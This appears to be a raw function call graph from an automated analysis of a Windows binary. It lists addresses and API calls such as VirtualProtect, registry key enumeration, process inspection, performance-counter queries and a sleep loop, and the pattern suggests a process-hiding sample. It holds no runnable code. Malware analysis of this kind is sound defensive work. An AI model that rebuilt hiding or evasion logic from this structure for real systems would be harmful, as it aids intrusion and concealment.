8301->8294 8303 22f4b9291d8 8302->8303 8303->8301 8305 22f4b924694 8304->8305 8306 22f4b9246b7 8304->8306 8305->8306 8318 22f4b924120 8305->8318 8309 22f4b9246ed 8306->8309 8324 22f4b924250 8306->8324 8312 22f4b924250 2 API calls 8309->8312 8315 22f4b92471d 8309->8315 8310 22f4b924753 8311 22f4b92476f 8310->8311 8313 22f4b924120 3 API calls 8310->8313 8314 22f4b92478b 8311->8314 8317 22f4b924250 2 API calls 8311->8317 8312->8315 8313->8311 8314->8284 8315->8310 8316 22f4b924120 3 API calls 8315->8316 8316->8310 8317->8314 8319 22f4b924141 8318->8319 8320 22f4b924196 VirtualQuery 8319->8320 8321 22f4b9241b0 8319->8321 8322 22f4b9241ca VirtualAlloc 8319->8322 8320->8319 8320->8321 8321->8306 8322->8321 8323 22f4b9241fb GetLastError 8322->8323 8323->8319 8327 22f4b924268 8324->8327 8325 22f4b9242d7 8325->8309 8326 22f4b9242bd VirtualQuery 8326->8325 8326->8327 8327->8325 8327->8326 8328 22f4b924322 GetLastError 8327->8328 8328->8327 8330 22f4b92796b 8329->8330 8331 22f4b927981 SetLastError 8330->8331 8332 22f4b92798f 8330->8332 8331->8332 8332->8289 8033 22f4b925ff9 8034 22f4b926000 VirtualProtect 8033->8034 8035 22f4b926029 GetLastError 8034->8035 8036 22f4b925f10 8034->8036 8035->8036 8037 22f4b9241f9 8038 22f4b924146 8037->8038 8039 22f4b924196 VirtualQuery 8038->8039 8040 22f4b9241b0 8038->8040 8041 22f4b9241ca VirtualAlloc 8038->8041 8039->8038 8039->8040 8041->8040 8042 22f4b9241fb GetLastError 8041->8042 8042->8038 8043 22f4b92cbfc 8048 22f4b92f3a0 8043->8048 8045 22f4b92cc05 8046 22f4b92cb10 __std_exception_copy 13 API calls 8045->8046 8047 22f4b92cc22 __vcrt_uninitialize_ptd 8045->8047 8046->8047 8049 22f4b92f3b1 8048->8049 8050 22f4b92f3b5 8048->8050 8049->8045 8050->8049 8051 22f4b92ef88 9 API calls 8050->8051 8051->8049 9095 22f4b93387c 9096 22f4b9338b4 __GSHandlerCheckCommon 9095->9096 9097 22f4b9338e0 9096->9097 9099 22f4b929a24 9096->9099 9100 22f4b929324 __CxxCallCatchBlock 9 API calls 9099->9100 9101 22f4b929a4e 9100->9101 9102 22f4b929324 __CxxCallCatchBlock 9 API calls 9101->9102 9103 22f4b929a5b 9102->9103 9104 22f4b929324 __CxxCallCatchBlock 9 API calls 9103->9104 9105 22f4b929a64 9104->9105 9105->9097 8052 22f4b92f820 8055 22f4b92f7d8 8052->8055 8060 22f4b92c558 EnterCriticalSection 8055->8060 8061 22f4b92fe20 8062 22f4b92fe4a 8061->8062 8063 22f4b92d220 _invalid_parameter_noinfo 13 API calls 8062->8063 8064 22f4b92fe6a 8063->8064 8065 22f4b92d2a0 __free_lconv_mon 13 API calls 8064->8065 8066 22f4b92fe78 8065->8066 8067 22f4b92fea2 8066->8067 8068 22f4b92d220 _invalid_parameter_noinfo 13 API calls 8066->8068 8069 22f4b92fec1 InitializeCriticalSectionEx 8067->8069 8072 22f4b92feab 8067->8072 8070 22f4b92fe94 8068->8070 8069->8067 8071 22f4b92d2a0 __free_lconv_mon 13 API calls 8070->8071 8071->8067 8673 22f4b924320 8675 22f4b92426d 8673->8675 8674 22f4b9242bd VirtualQuery 8674->8675 8677 22f4b9242d7 8674->8677 8675->8674 8676 22f4b924322 GetLastError 8675->8676 8675->8677 8676->8675 8073 22f4b92c828 8074 22f4b92c842 8073->8074 8075 22f4b92c82d 8073->8075 8079 22f4b92c848 8075->8079 8080 22f4b92c892 8079->8080 8081 22f4b92c88a 8079->8081 8083 22f4b92d2a0 __free_lconv_mon 13 API calls 8080->8083 8082 22f4b92d2a0 __free_lconv_mon 13 API calls 8081->8082 8082->8080 8084 22f4b92c89f 8083->8084 8085 22f4b92d2a0 __free_lconv_mon 13 API calls 8084->8085 8086 22f4b92c8ac 8085->8086 8087 22f4b92d2a0 __free_lconv_mon 13 API calls 8086->8087 8088 22f4b92c8b9 8087->8088 8089 22f4b92d2a0 __free_lconv_mon 13 API calls 8088->8089 8090 22f4b92c8c6 8089->8090 8091 22f4b92d2a0 __free_lconv_mon 13 API calls 8090->8091 8092 22f4b92c8d3 8091->8092 8093 22f4b92d2a0 __free_lconv_mon 13 API calls 8092->8093 8094 22f4b92c8e0 8093->8094 8095 22f4b92d2a0 __free_lconv_mon 13 API calls 8094->8095 8096 22f4b92c8ed 8095->8096 8097 22f4b92d2a0 __free_lconv_mon 13 API calls 8096->8097 8098 22f4b92c8fd 8097->8098 8099 22f4b92d2a0 __free_lconv_mon 13 API calls 8098->8099 8100 22f4b92c90d 8099->8100 8105 22f4b92c6f8 8100->8105 8119 22f4b92c558 EnterCriticalSection 8105->8119 8333 22f4b930fa8 8334 22f4b930fcc 8333->8334 8335 22f4b928070 _invalid_parameter_noinfo 8 API calls 8334->8335 8336 22f4b93100e 8335->8336 8337 22f4b9233a8 8338 22f4b9233cf 8337->8338 8339 22f4b92349c 8338->8339 8340 22f4b9233ec PdhGetCounterInfoW 8338->8340 8340->8339 8341 22f4b92340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8340->8341 8342 22f4b923440 StrCmpW 8341->8342 8343 22f4b923488 GetProcessHeap HeapFree 8341->8343 8342->8343 8344 22f4b923455 8342->8344 8343->8339 8344->8343 8346 22f4b923950 StrCmpNW 8344->8346 8347 22f4b923982 StrStrW 8346->8347 8348 22f4b9239f2 8346->8348 8347->8348 8349 22f4b92399b StrToIntW 8347->8349 8348->8344 8349->8348 8350 22f4b9239c3 8349->8350 8350->8348 8356 22f4b921a30 OpenProcess 8350->8356 8353 22f4b923f88 StrCmpNIW 8354 22f4b9239e4 8353->8354 8354->8348 8362 22f4b921cfc 8354->8362 8357 22f4b921ab6 8356->8357 8358 22f4b921a64 K32GetModuleFileNameExW 8356->8358 8357->8348 8357->8353 8359 22f4b921aad CloseHandle 8358->8359 8360 22f4b921a7e PathFindFileNameW lstrlenW 8358->8360 8359->8357 8360->8359 8361 22f4b921a9c StrCpyW 8360->8361 8361->8359 8363 22f4b921d1c 8362->8363 8364 22f4b921d13 8362->8364 8363->8348 8365 22f4b921530 2 API calls 8364->8365 8365->8363 9129 22f4b92aaac 9130 22f4b92aad9 __except_validate_context_record 9129->9130 9131 22f4b929324 __CxxCallCatchBlock 9 API calls 9130->9131 9132 22f4b92aade 9131->9132 9134 22f4b92ab38 9132->9134 9136 22f4b92abc6 9132->9136 9143 22f4b92ab8c 9132->9143 9133 22f4b92ac34 9133->9143 9171 22f4b92a22c 9133->9171 9135 22f4b92abb3 9134->9135 9134->9143 9144 22f4b92ab5a __GetCurrentState 9134->9144 9158 22f4b9295d0 9135->9158 9140 22f4b92abe5 9136->9140 9165 22f4b9299cc 9136->9165 9140->9133 9140->9143 9168 22f4b9299e0 9140->9168 9141 22f4b92acdd 9144->9141 9146 22f4b92afb8 9144->9146 9147 22f4b9299cc Is_bad_exception_allowed 9 API calls 9146->9147 9148 22f4b92afe7 __GetCurrentState 9147->9148 9149 22f4b929324 __CxxCallCatchBlock 9 API calls 9148->9149 9156 22f4b92b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9149->9156 9150 22f4b92b0fb 9151 22f4b929324 __CxxCallCatchBlock 9 API calls 9150->9151 9152 22f4b92b100 9151->9152 9153 22f4b929324 __CxxCallCatchBlock 9 API calls 9152->9153 9154 22f4b92b10b __FrameHandler3::GetHandlerSearchState 9152->9154 9153->9154 9154->9143 9155 22f4b9299cc 9 API calls Is_bad_exception_allowed 9155->9156 9156->9150 9156->9154 9156->9155 9157 22f4b9299f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9156->9157 9157->9156 9228 22f4b929634 9158->9228 9160 22f4b9295ef __FrameHandler3::ExecutionInCatch 9232 22f4b929540 9160->9232 9163 22f4b92afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9164 22f4b929624 9163->9164 9164->9143 9166 22f4b929324 __CxxCallCatchBlock 9 API calls 9165->9166 9167 22f4b9299d5 9166->9167 9167->9140 9169 22f4b929324 __CxxCallCatchBlock 9 API calls 9168->9169 9170 22f4b9299e9 9169->9170 9170->9133 9236 22f4b92b144 9171->9236 9174 22f4b92a6f4 9175 22f4b92a645 9175->9174 9214 22f4b92a643 9175->9214 9289 22f4b92a6fc 9175->9289 9176 22f4b92a373 9176->9175 9220 22f4b92a3ab 9176->9220 9177 22f4b929324 __CxxCallCatchBlock 9 API calls 9179 22f4b92a687 9177->9179 9179->9174 9183 22f4b928070 _invalid_parameter_noinfo 8 API calls 9179->9183 9180 22f4b92a575 9184 22f4b92a592 9180->9184 9186 22f4b9299cc Is_bad_exception_allowed 9 API calls 9180->9186 9180->9214 9181 22f4b929324 __CxxCallCatchBlock 9 API calls 9182 22f4b92a2da 9181->9182 9182->9179 9187 22f4b929324 __CxxCallCatchBlock 9 API calls 9182->9187 9185 22f4b92a69a 9183->9185 9191 22f4b92a5b4 9184->9191 9184->9214 9282 22f4b9295a4 9184->9282 9185->9143 9186->9184 9188 22f4b92a2ea 9187->9188 9190 22f4b929324 __CxxCallCatchBlock 9 API calls 9188->9190 9194 22f4b92a2f3 9190->9194 9192 22f4b92a5ca 9191->9192 9193 22f4b92a6d7 9191->9193 9191->9214 9195 22f4b92a5d5 9192->9195 9198 22f4b9299cc Is_bad_exception_allowed 9 API calls 9192->9198 9196 22f4b929324 __CxxCallCatchBlock 9 API calls 9193->9196 9247 22f4b929a0c 9194->9247 9202 22f4b92b1dc 9 API calls 9195->9202 9199 22f4b92a6dd 9196->9199 9198->9195 9201 22f4b929324 __CxxCallCatchBlock 9 API calls 9199->9201 9204 22f4b92a6e6 9201->9204 9205 22f4b92a5eb 9202->9205 9203 22f4b9299e0 9 API calls 9203->9220 9207 22f4b92c2f4 14 API calls 9204->9207 9209 22f4b929634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9205->9209 9205->9214 9206 22f4b929324 __CxxCallCatchBlock 9 API calls 9208 22f4b92a335 9206->9208 9207->9174 9208->9176 9211 22f4b929324 __CxxCallCatchBlock 9 API calls 9208->9211 9210 22f4b92a605 9209->9210 9286 22f4b929838 RtlUnwindEx 9210->9286 9213 22f4b92a341 9211->9213 9215 22f4b929324 __CxxCallCatchBlock 9 API calls 9213->9215 9214->9177 9217 22f4b92a34a 9215->9217 9250 22f4b92b1dc 9217->9250 9220->9180 9220->9203 9261 22f4b92a96c 9220->9261 9275 22f4b92a158 9220->9275 9222 22f4b92a35e 9257 22f4b92b2cc 9222->9257 9224 22f4b92a6d1 9225 22f4b92c2f4 14 API calls 9224->9225 9225->9193 9226 22f4b92a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9226->9224 9227 22f4b929178 Concurrency::cancel_current_task 2 API calls 9226->9227 9227->9224 9231 22f4b929662 __FrameHandler3::ExecutionInCatch 9228->9231 9229 22f4b9296d4 9229->9160 9230 22f4b92968c RtlLookupFunctionEntry 9230->9231 9231->9229 9231->9230 9233 22f4b929560 9232->9233 9234 22f4b92958b 9232->9234 9233->9234 9235 22f4b929324 __CxxCallCatchBlock 9 API calls 9233->9235 9234->9163 9235->9233 9237 22f4b92b169 __FrameHandler3::ExecutionInCatch 9236->9237 9238 22f4b929634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9237->9238 9239 22f4b92b17e 9238->9239 9301 22f4b929db4 9239->9301 9242 22f4b92b190 __FrameHandler3::GetHandlerSearchState 9304 22f4b929dec 9242->9304 9243 22f4b92b1b3 9244 22f4b929db4 __GetUnwindTryBlock RtlLookupFunctionEntry 9243->9244 9245 22f4b92a28e 9244->9245 9245->9174 9245->9176 9245->9181 9248 22f4b929324 __CxxCallCatchBlock 9 API calls 9247->9248 9249 22f4b929a1a 9248->9249 9249->9174 9249->9206 9252 22f4b92b2c3 9250->9252 9254 22f4b92b207 9250->9254 9251 22f4b92a35a 9251->9176 9251->9222 9253 22f4b9299e0 9 API calls 9253->9254 9254->9251 9254->9253 9255 22f4b9299cc Is_bad_exception_allowed 9 API calls 9254->9255 9256 22f4b92a96c 9 API calls 9254->9256 9255->9254 9256->9254 9258 22f4b92b339 9257->9258 9260 22f4b92b2e9 Is_bad_exception_allowed 9257->9260 9258->9226 9259 22f4b9299cc 9 API calls Is_bad_exception_allowed 9259->9260 9260->9258 9260->9259 9262 22f4b92a999 9261->9262 9271 22f4b92aa28 9261->9271 9263 22f4b9299cc Is_bad_exception_allowed 9 API calls 9262->9263 9264 22f4b92a9a2 9263->9264 9265 22f4b9299cc Is_bad_exception_allowed 9 API calls 9264->9265 9266 22f4b92a9bb 9264->9266 9264->9271 9265->9266 9267 22f4b92a9e7 9266->9267 9268 22f4b9299cc Is_bad_exception_allowed 9 API calls 9266->9268 9266->9271 9269 22f4b9299e0 9 API calls 9267->9269 9268->9267 9270 22f4b92a9fb 9269->9270 9270->9271 9272 22f4b92aa14 9270->9272 9273 22f4b9299cc Is_bad_exception_allowed 9 API calls 9270->9273 9271->9220 9274 22f4b9299e0 9 API calls 9272->9274 9273->9272 9274->9271 9276 22f4b929634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9275->9276 9277 22f4b92a195 9276->9277 9278 22f4b9299cc Is_bad_exception_allowed 9 API calls 9277->9278 9279 22f4b92a1cd 9278->9279 9280 22f4b929838 9 API calls 9279->9280 9281 22f4b92a211 9280->9281 9281->9220 9283 22f4b9295b8 __FrameHandler3::ExecutionInCatch 9282->9283 9284 22f4b929540 __FrameHandler3::ExecutionInCatch 9 API calls 9283->9284 9285 22f4b9295c2 9284->9285 9285->9191 9287 22f4b928070 _invalid_parameter_noinfo 8 API calls 9286->9287 9288 22f4b929932 9287->9288 9288->9214 9290 22f4b92a735 9289->9290 9291 22f4b92a948 9289->9291 9292 22f4b929324 __CxxCallCatchBlock 9 API calls 9290->9292 9291->9214 9293 22f4b92a73a 9292->9293 9294 22f4b92a759 EncodePointer 9293->9294 9299 22f4b92a7ac 9293->9299 9295 22f4b929324 __CxxCallCatchBlock 9 API calls 9294->9295 9296 22f4b92a769 9295->9296 9296->9299 9307 22f4b9294ec 9296->9307 9298 22f4b92a158 19 API calls 9298->9299 9299->9291 9299->9298 9300 22f4b9299cc 9 API calls Is_bad_exception_allowed 9299->9300 9300->9299 9302 22f4b929634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9301->9302 9303 22f4b929dc7 9302->9303 9303->9242 9303->9243 9305 22f4b929634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9304->9305 9306 22f4b929e06 9305->9306 9306->9245 9308 22f4b929324 __CxxCallCatchBlock 9 API calls 9307->9308 9309 22f4b929518 9308->9309 9309->9299 8121 22f4b934611 __scrt_dllmain_exception_filter 8681 22f4b92c510 8682 22f4b92c518 8681->8682 8683 22f4b92c545 8682->8683 8685 22f4b92c574 8682->8685 8686 22f4b92c59f 8685->8686 8687 22f4b92c582 DeleteCriticalSection 8686->8687 8688 22f4b92c5a3 8686->8688 8687->8686 8688->8683 8122 22f4b92c218 8123 22f4b92d2a0 __free_lconv_mon 13 API calls 8122->8123 8124 22f4b92c228 8123->8124 8125 22f4b92d2a0 __free_lconv_mon 13 API calls 8124->8125 8126 22f4b92c23c 8125->8126 8127 22f4b92d2a0 __free_lconv_mon 13 API calls 8126->8127 8128 22f4b92c250 8127->8128 8129 22f4b92d2a0 __free_lconv_mon 13 API calls 8128->8129 8130 22f4b92c264 8129->8130 8366 22f4b931398 8367 22f4b9313ae 8366->8367 8368 22f4b9313f5 8367->8368 8370 22f4b93140e 8367->8370 8369 22f4b92d1f4 __std_exception_copy 13 API calls 8368->8369 8371 22f4b9313fa 8369->8371 8372 22f4b931405 8370->8372 8374 22f4b92dd78 14 API calls 8370->8374 8375 22f4b92d04c 8371->8375 8374->8372 8378 22f4b92cef8 8375->8378 8379 22f4b92cf23 8378->8379 8386 22f4b92cf94 8379->8386 8381 22f4b92cf4a 8382 22f4b92cf6d 8381->8382 8396 22f4b92c3e0 8381->8396 8384 22f4b92cf82 8382->8384 8385 22f4b92c3e0 _invalid_parameter_noinfo 17 API calls 8382->8385 8384->8372 8385->8384 8409 22f4b92ccc8 8386->8409 8391 22f4b92cfcf 8391->8381 8397 22f4b92c3ef GetLastError 8396->8397 8398 22f4b92c438 8396->8398 8399 22f4b92c404 8397->8399 8398->8382 8400 22f4b92cba0 _invalid_parameter_noinfo 14 API calls 8399->8400 8401 22f4b92c41e SetLastError 8400->8401 8401->8398 8402 22f4b92c441 8401->8402 8403 22f4b92c3e0 _invalid_parameter_noinfo 15 API calls 8402->8403 8404 22f4b92c467 8403->8404 8435 22f4b92ffe8 8404->8435 8410 22f4b92cd1f 8409->8410 8411 22f4b92cce4 GetLastError 8409->8411 8410->8391 8415 22f4b92cd34 8410->8415 8412 22f4b92ccf4 8411->8412 8422 22f4b92cba0 8412->8422 8416 22f4b92cd50 GetLastError SetLastError 8415->8416 8417 22f4b92cd68 8415->8417 8416->8417 8417->8391 8418 22f4b92d06c IsProcessorFeaturePresent 8417->8418 8419 22f4b92d07f 8418->8419 8427 22f4b92cd80 8419->8427 8423 22f4b92cbc8 FlsGetValue 8422->8423 8425 22f4b92cbc4 8422->8425 8423->8425 8424 22f4b92cbde SetLastError 8424->8410 8425->8424 8426 22f4b92c940 _invalid_parameter_noinfo 13 API calls 8425->8426 8426->8424 8428 22f4b92cdba _invalid_parameter_noinfo 8427->8428 8429 22f4b92cde2 RtlCaptureContext RtlLookupFunctionEntry 8428->8429 8430 22f4b92ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8429->8430 8431 22f4b92ce2e RtlVirtualUnwind 8429->8431 8432 22f4b92ceb6 _invalid_parameter_noinfo 8430->8432 8431->8430 8433 22f4b928070 _invalid_parameter_noinfo 8 API calls 8432->8433 8434 22f4b92ced5 GetCurrentProcess TerminateProcess 8433->8434 8436 22f4b930001 8435->8436 8437 22f4b92c48f 8435->8437 8436->8437 8438 22f4b930a40 _invalid_parameter_noinfo 14 API calls 8436->8438 8439 22f4b930054 8437->8439 8438->8437 8440 22f4b92c49f 8439->8440 8441 22f4b93006d 8439->8441 8440->8382 8441->8440 8442 22f4b92e8c4 _invalid_parameter_noinfo 14 API calls 8441->8442 8442->8440 8689 22f4b922518 GetProcessIdOfThread GetCurrentProcessId 8690 22f4b922543 CreateFileW 8689->8690 8691 22f4b9225be 8689->8691 8690->8691 8692 22f4b922577 WriteFile ReadFile CloseHandle 8690->8692 8692->8691 8443 22f4b93479d 8446 22f4b92af34 8443->8446 8447 22f4b92af4e 8446->8447 8449 22f4b92af9b 8446->8449 8448 22f4b929324 __CxxCallCatchBlock 9 API calls 8447->8448 8447->8449 8448->8449 8450 22f4b9347c2 8451 22f4b929978 __CxxCallCatchBlock 9 API calls 8450->8451 8454 22f4b9347d5 8451->8454 8452 22f4b934814 __CxxCallCatchBlock 8453 22f4b929324 __CxxCallCatchBlock 9 API calls 8452->8453 8455 22f4b934828 8453->8455 8454->8452 8457 22f4b928ff8 __CxxCallCatchBlock 9 API calls 8454->8457 8456 22f4b929324 __CxxCallCatchBlock 9 API calls 8455->8456 8458 22f4b934838 8456->8458 8457->8452 8131 22f4b92ae42 8144 22f4b929324 8131->8144 8133 22f4b92ae93 RaiseException 8134 22f4b92aeba 8133->8134 8147 22f4b929978 8134->8147 8135 22f4b92ae4f __CxxCallCatchBlock 8135->8133 8137 22f4b92aeeb __CxxCallCatchBlock 8138 22f4b929324 __CxxCallCatchBlock 9 API calls 8137->8138 8139 22f4b92aefe 8138->8139 8141 22f4b929324 __CxxCallCatchBlock 9 API calls 8139->8141 8143 22f4b92af07 8141->8143 8145 22f4b929340 __CxxCallCatchBlock 9 API calls 8144->8145 8146 22f4b92932d 8145->8146 8146->8135 8148 22f4b929324 __CxxCallCatchBlock 9 API calls 8147->8148 8149 22f4b92998a 8148->8149 8150 22f4b9299c5 8149->8150 8151 22f4b929324 __CxxCallCatchBlock 9 API calls 8149->8151 8152 22f4b929995 8151->8152 8152->8150 8153 22f4b929324 __CxxCallCatchBlock 9 API calls 8152->8153 8154 22f4b9299b6 8153->8154 8154->8137 8155 22f4b928ff8 8154->8155 8156 22f4b929324 __CxxCallCatchBlock 9 API calls 8155->8156 8157 22f4b929006 8156->8157 8157->8137 8158 22f4b92f440 GetProcessHeap 8693 22f4b92ff40 8694 22f4b92ff4b 8693->8694 8702 22f4b932c24 8694->8702 8715 22f4b92c558 EnterCriticalSection 8702->8715 8459 22f4b9281c0 8460 22f4b9281c9 __scrt_release_startup_lock 8459->8460 8461 22f4b9281cd 8460->8461 8463 22f4b92bbb4 8460->8463 8464 22f4b92bbd4 8463->8464 8465 22f4b92bbed 8463->8465 8466 22f4b92bbf2 8464->8466 8467 22f4b92bbdc 8464->8467 8465->8461 8468 22f4b92e864 56 API calls 8466->8468 8469 22f4b92d1f4 __std_exception_copy 13 API calls 8467->8469 8470 22f4b92bbf7 8468->8470 8471 22f4b92bbe1 8469->8471 8492 22f4b92df38 GetModuleFileNameW 8470->8492 8473 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8471->8473 8473->8465 8479 22f4b92bc7a 8481 22f4b92b994 14 API calls 8479->8481 8480 22f4b92bc69 8482 22f4b92d1f4 __std_exception_copy 13 API calls 8480->8482 8484 22f4b92bc96 8481->8484 8491 22f4b92bc6e 8482->8491 8483 22f4b92d2a0 __free_lconv_mon 13 API calls 8483->8465 8485 22f4b92bcdf 8484->8485 8486 22f4b92bcc6 8484->8486 8484->8491 8489 22f4b92d2a0 __free_lconv_mon 13 API calls 8485->8489 8487 22f4b92d2a0 __free_lconv_mon 13 API calls 8486->8487 8488 22f4b92bccf 8487->8488 8490 22f4b92d2a0 __free_lconv_mon 13 API calls 8488->8490 8489->8491 8490->8465 8491->8483 8493 22f4b92df91 8492->8493 8494 22f4b92df7d GetLastError 8492->8494 8496 22f4b92dd78 14 API calls 8493->8496 8516 22f4b92d184 8494->8516 8497 22f4b92dfbf 8496->8497 8498 22f4b92dfd0 8497->8498 8521 22f4b92f198 8497->8521 8525 22f4b92de1c 8498->8525 8500 22f4b928070 _invalid_parameter_noinfo 8 API calls 8501 22f4b92bc0e 8500->8501 8504 22f4b92b994 8501->8504 8503 22f4b92df8a 8503->8500 8507 22f4b92b9d2 8504->8507 8506 22f4b92ba38 8508 22f4b92bb25 8506->8508 8509 22f4b92ec1c 14 API calls 8506->8509 8507->8506 8542 22f4b92ec1c 8507->8542 8510 22f4b92bb54 8508->8510 8509->8506 8511 22f4b92bba4 8510->8511 8512 22f4b92bb6c 8510->8512 8511->8479 8511->8480 8512->8511 8513 22f4b92d220 _invalid_parameter_noinfo 13 API calls 8512->8513 8514 22f4b92bb9a 8513->8514 8515 22f4b92d2a0 __free_lconv_mon 13 API calls 8514->8515 8515->8511 8539 22f4b92d1d0 8516->8539 8518 22f4b92d191 __free_lconv_mon 8519 22f4b92d1f4 __std_exception_copy 13 API calls 8518->8519 8520 22f4b92d1a1 8519->8520 8520->8503 8522 22f4b92f1ca 8521->8522 8523 22f4b92f1a9 8521->8523 8522->8498 8523->8522 8524 22f4b92ef88 9 API calls 8523->8524 8524->8522 8526 22f4b92de5b 8525->8526 8529 22f4b92de40 8525->8529 8527 22f4b92de60 8526->8527 8528 22f4b92ece8 WideCharToMultiByte 8526->8528 8527->8529 8530 22f4b92d1f4 __std_exception_copy 13 API calls 8527->8530 8531 22f4b92deb7 8528->8531 8529->8503 8530->8529 8531->8527 8532 22f4b92debe GetLastError 8531->8532 8534 22f4b92dee9 8531->8534 8533 22f4b92d184 13 API calls 8532->8533 8536 22f4b92decb 8533->8536 8535 22f4b92ece8 WideCharToMultiByte 8534->8535 8537 22f4b92df10 8535->8537 8538 22f4b92d1f4 __std_exception_copy 13 API calls 8536->8538 8537->8529 8537->8532 8538->8529 8540 22f4b92cb10 __std_exception_copy 13 API calls 8539->8540 8541 22f4b92d1d9 8540->8541 8541->8518 8543 22f4b92eba8 8542->8543 8544 22f4b92dd78 14 API calls 8543->8544 8545 22f4b92ebcc 8544->8545 8545->8507 7454 22f4b921bc4 7461 22f4b921724 GetProcessHeap HeapAlloc 7454->7461 7456 22f4b921bda SleepEx 7457 22f4b921724 50 API calls 7456->7457 7459 22f4b921bd3 7457->7459 7459->7456 7460 22f4b92159c StrCmpIW StrCmpW 7459->7460 7512 22f4b9219b0 7459->7512 7460->7459 7529 22f4b921264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7461->7529 7463 22f4b92174c 7530 22f4b921000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7463->7530 7465 22f4b921754 7531 22f4b921264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7465->7531 7467 22f4b92175d 7532 22f4b921264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7467->7532 7469 22f4b921766 7533 22f4b921264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7469->7533 7471 22f4b92176f 7534 22f4b921000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7471->7534 7473 22f4b921778 7535 22f4b921000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7473->7535 7475 22f4b921781 7536 22f4b921000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7475->7536 7477 22f4b92178a RegOpenKeyExW 7478 22f4b9219a2 7477->7478 7479 22f4b9217bc RegOpenKeyExW 7477->7479 7478->7459 7480 22f4b9217e5 7479->7480 7481 22f4b9217fb RegOpenKeyExW 7479->7481 7537 22f4b9212b8 RegQueryInfoKeyW 7480->7537 7483 22f4b92181f 7481->7483 7484 22f4b921836 RegOpenKeyExW 7481->7484 7546 22f4b92104c RegQueryInfoKeyW 7483->7546 7487 22f4b921871 RegOpenKeyExW 7484->7487 7488 22f4b92185a 7484->7488 7490 22f4b921895 7487->7490 7491 22f4b9218ac RegOpenKeyExW 7487->7491 7489 22f4b9212b8 16 API calls 7488->7489 7493 22f4b921867 RegCloseKey 7489->7493 7494 22f4b9212b8 16 API calls 7490->7494 7495 22f4b9218d0 7491->7495 7496 22f4b9218e7 RegOpenKeyExW 7491->7496 7493->7487 7497 22f4b9218a2 RegCloseKey 7494->7497 7498 22f4b9212b8 16 API calls 7495->7498 7499 22f4b921922 RegOpenKeyExW 7496->7499 7500 22f4b92190b 7496->7500 7497->7491 7501 22f4b9218dd RegCloseKey 7498->7501 7503 22f4b921946 7499->7503 7504 22f4b92195d RegOpenKeyExW 7499->7504 7502 22f4b92104c 6 API calls 7500->7502 7501->7496 7508 22f4b921918 RegCloseKey 7502->7508 7505 22f4b92104c 6 API calls 7503->7505 7506 22f4b921981 7504->7506 7507 22f4b921998 RegCloseKey 7504->7507 7509 22f4b921953 RegCloseKey 7505->7509 7510 22f4b92104c 6 API calls 7506->7510 7507->7478 7508->7499 7509->7504 7511 22f4b92198e RegCloseKey 7510->7511 7511->7507 7556 22f4b9214a0 7512->7556 7529->7463 7530->7465 7531->7467 7532->7469 7533->7471 7534->7473 7535->7475 7536->7477 7538 22f4b921486 RegCloseKey 7537->7538 7539 22f4b921323 GetProcessHeap HeapAlloc 7537->7539 7538->7481 7540 22f4b921472 GetProcessHeap HeapFree 7539->7540 7541 22f4b92134e RegEnumValueW 7539->7541 7540->7538 7542 22f4b9213a1 7541->7542 7542->7540 7542->7541 7544 22f4b9213cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7542->7544 7545 22f4b92141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7542->7545 7551 22f4b921530 7542->7551 7544->7545 7545->7542 7547 22f4b9210bf 7546->7547 7548 22f4b9211b5 RegCloseKey 7546->7548 7547->7548 7549 22f4b9210cf RegEnumValueW 7547->7549 7550 22f4b92114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7547->7550 7548->7484 7549->7547 7550->7547 7554 22f4b921580 7551->7554 7555 22f4b92154a 7551->7555 7552 22f4b921561 StrCmpIW 7552->7555 7553 22f4b921569 StrCmpW 7553->7555 7554->7542 7555->7552 7555->7553 7555->7554 7557 22f4b9214e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7556->7557 7558 22f4b9214c2 GetProcessHeap HeapFree 7556->7558 7558->7557 7558->7558 8159 22f4b934848 8162 22f4b92904c 8159->8162 8163 22f4b929076 8162->8163 8164 22f4b929064 8162->8164 8166 22f4b929324 __CxxCallCatchBlock 9 API calls 8163->8166 8164->8163 8165 22f4b92906c 8164->8165 8168 22f4b929324 __CxxCallCatchBlock 9 API calls 8165->8168 8171 22f4b929074 8165->8171 8167 22f4b92907b 8166->8167 8169 22f4b929324 __CxxCallCatchBlock 9 API calls 8167->8169 8167->8171 8170 22f4b92909b 8168->8170 8169->8171 8172 22f4b929324 __CxxCallCatchBlock 9 API calls 8170->8172 8173 22f4b9290a8 8172->8173 8174 22f4b92c2f4 14 API calls 8173->8174 8175 22f4b9290b1 8174->8175 8176 22f4b92c2f4 14 API calls 8175->8176 8177 22f4b9290bd 8176->8177 8716 22f4b92ad48 8717 22f4b929324 __CxxCallCatchBlock 9 API calls 8716->8717 8718 22f4b92ad7d 8717->8718 8719 22f4b929324 __CxxCallCatchBlock 9 API calls 8718->8719 8720 22f4b92ad8b __except_validate_context_record 8719->8720 8721 22f4b929324 __CxxCallCatchBlock 9 API calls 8720->8721 8722 22f4b92adcf 8721->8722 8723 22f4b929324 __CxxCallCatchBlock 9 API calls 8722->8723 8724 22f4b92add8 8723->8724 8725 22f4b929324 __CxxCallCatchBlock 9 API calls 8724->8725 8726 22f4b92ade1 8725->8726 8739 22f4b92993c 8726->8739 